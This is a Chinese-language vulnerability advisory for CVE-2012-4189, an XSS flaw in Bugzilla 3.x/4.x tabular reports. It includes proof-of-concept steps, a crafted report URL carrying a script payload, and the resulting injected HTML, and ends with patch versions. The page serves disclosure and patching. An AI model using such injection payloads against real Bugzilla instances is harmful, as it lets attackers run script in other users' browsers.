Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Bugzilla tabular报表字段值错误转义跨站脚本执行漏洞

发布日期:2012-11-14
更新日期:2012-11-15受影响系统:
Mozilla Bugzilla 4.x
Mozilla Bugzilla  3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56504
CVE ID: CVE-2012-4189Bugzilla是一个开源的缺陷跟踪系统,它可以管理软件开发中缺陷的提交,修复,关闭等整个生命周期。Bugzilla没有正确过滤tabular报表内的字段值,攻击者可利用此漏洞注入代码,导致跨站脚本执行。<*来源:Mateusz Goik
 
  链接:https://bugzilla.mozilla.org/show_bug.cgi?id=790296
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!PoC:http://localhost/cgi-bin/bug/editversions.cgi?action=add&product=TestProduct ->
Version: "><script>alert(1);</script>Add new bug to "TestProduct" with version "><script>alert(1);</script>http://localhost/cgi-bin/bug/query.cgi?format=report-table ->
Horizontal Axis: Version
should be the results: Version: "><script>alert(1);</script>
-> Generate Reporthttp://localhost/cgi-bin/bug/report.cgi?x_axis_field=version&y_axis_field=&z_axis_field=&query_format=report-table&short_desc_type=allwordssubstr&short_desc=&resolution=---&longdesc_type=allwordssubstr&longdesc=&bug_file_loc_type=allwordssubstr&bug_file_loc=&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=&bug_id_type=anyexact&version=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&emailassigned_to1=1&emailtype1=substring&email1=&emailassigned_to2=1&emailreporter2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrapResult:+ oColumn.field + "&amp;version="><script>alert(1);</script>">"
elLiner.innerHTML = "<a href="buglist.cgi?action=wrap&amp;resolution=---&amp;version="><script>alert(1);</script>">"
   <a href="buglist.cgi?action=wrap&amp;resolution=---&amp;version="><script>alert(1);</script>">5</a>
<a href="buglist.cgi?action=wrap&amp;resolution=---&amp;=%20&amp;version="><script>alert(1);</script>">5</a>建议:
--------------------------------------------------------------------------------
厂商补丁:Mozilla
-------
目前厂商已经发布了升级补丁3.6.12, 4.0.9, 4.2.4, 4.4rc1 以修复这个安全问题,请到厂商的主页下载:http://www.mozilla.org/security/Bugzilla 错误消息信息泄露漏洞WordPress WP e-Commerce插件多个SQL注入和跨站脚本执行漏洞相关资讯      bugzilla  Bugzilla安全漏洞 
  • 在 FreeBSD 10.2 上如何通过配置   (02月16日)
  • 攻击者入侵 Bugzilla 访问未公开   (09/06/2015 21:15:51)
  • Linux 安装 Bugzilla 及打补丁,添  (03/22/2015 19:35:14)
  • Bugzilla Util.pm权限提升漏洞(CVE  (09/15/2015 19:09:15)
  • Bugzilla 5.0 新特性:新增REST   (07/31/2015 09:04:11)
  • Bugzilla命令注入及安全限制绕过漏  (01/27/2015 18:39:51)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上